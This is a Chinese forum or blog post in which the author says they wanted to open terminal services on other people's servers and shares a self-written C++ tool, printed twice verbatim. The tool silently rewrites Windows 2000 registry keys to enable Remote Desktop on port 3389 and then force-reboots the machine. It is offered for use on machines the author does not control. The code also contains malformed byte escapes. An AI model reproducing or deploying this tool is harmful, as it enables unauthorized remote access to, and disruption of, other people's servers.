嗯,这个东西已经被讨论过很多次了,但是小弟我今天才用到:我在Play的时候想开别人的终端服务,找了很多文章来看,但是工具却下不下来,只好自己写了一个,见笑了。在一台2000server+sp3的服务器上成功。
#include "windows.h"
#include "iostream.h"
void main(int argc, char* argv[])
{
HKEY hKey;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
LPCTSTR key[]={"SOFTWARE//Microsoft//Windows//CurrentVersion//netcache//",
"SOFTWARE//Policies//Microsoft//Windows//Installer//",
"SYSTEM//CurrentControlSet//Control//Terminal Server//",
"SYSTEM//CurrentControlSet//Services//TermDD//",
"SYSTEM//CurrentControlSet//Services//TermService//",
"SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp//",
".DEFAULT//Keyboard Layout//Toggle//"};
HKEY head[]={HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_USERS};
DWORD type[] = {REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_SZ};
LPCTSTR value[] = {"/x00/x00/x00/x00", "/x01/x00/x00/x00", "/x01/x00/x00/x00", "/x02/x00/x00/x00", "/x02/x00/x00/x00", "/x3d/x0d/x00/00", "2"};
DWORD length[] = {4, 4, 4, 4, 4, 4, 2};
LPCTSTR name[] = {"Enabled","EnableAdminTSRemote","TSEnabled","Start","Start","PortNumber","Hotkey"};
for(int i = 0; i < 2; i++)
RegCreateKeyEx(head[i],key[i],0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hKey,NULL);
for(i = 0; i < 7; i++)
{
if(::RegOpenKeyEx(head[i], key[i], 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
{
cout<<"Error Opening Register.../n";
return;
}
if(::RegSetValueEx(hKey, name[i], 0, type[i], (LPBYTE)value[i], length[i]) != ERROR_SUCCESS)
{
cout<<"Error Writing Register.../n";
return;
}
}
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
if(!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)
||!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID))
{
cout<<"Error! Try iisreset.exe /reboot to reboot system!";
return;
}
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0);
return;
}
#include "windows.h"
#include "iostream.h"
void main(int argc, char* argv[])
{
HKEY hKey;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
LPCTSTR key[]={"SOFTWARE//Microsoft//Windows//CurrentVersion//netcache//",
"SOFTWARE//Policies//Microsoft//Windows//Installer//",
"SYSTEM//CurrentControlSet//Control//Terminal Server//",
"SYSTEM//CurrentControlSet//Services//TermDD//",
"SYSTEM//CurrentControlSet//Services//TermService//",
"SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp//",
".DEFAULT//Keyboard Layout//Toggle//"};
HKEY head[]={HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_USERS};
DWORD type[] = {REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_SZ};
LPCTSTR value[] = {"/x00/x00/x00/x00", "/x01/x00/x00/x00", "/x01/x00/x00/x00", "/x02/x00/x00/x00", "/x02/x00/x00/x00", "/x3d/x0d/x00/00", "2"};
DWORD length[] = {4, 4, 4, 4, 4, 4, 2};
LPCTSTR name[] = {"Enabled","EnableAdminTSRemote","TSEnabled","Start","Start","PortNumber","Hotkey"};
for(int i = 0; i < 2; i++)
RegCreateKeyEx(head[i],key[i],0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hKey,NULL);
for(i = 0; i < 7; i++)
{
if(::RegOpenKeyEx(head[i], key[i], 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
{
cout<<"Error Opening Register.../n";
return;
}
if(::RegSetValueEx(hKey, name[i], 0, type[i], (LPBYTE)value[i], length[i]) != ERROR_SUCCESS)
{
cout<<"Error Writing Register.../n";
return;
}
}
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
if(!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)
||!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID))
{
cout<<"Error! Try iisreset.exe /reboot to reboot system!";
return;
}
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0);
return;
}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
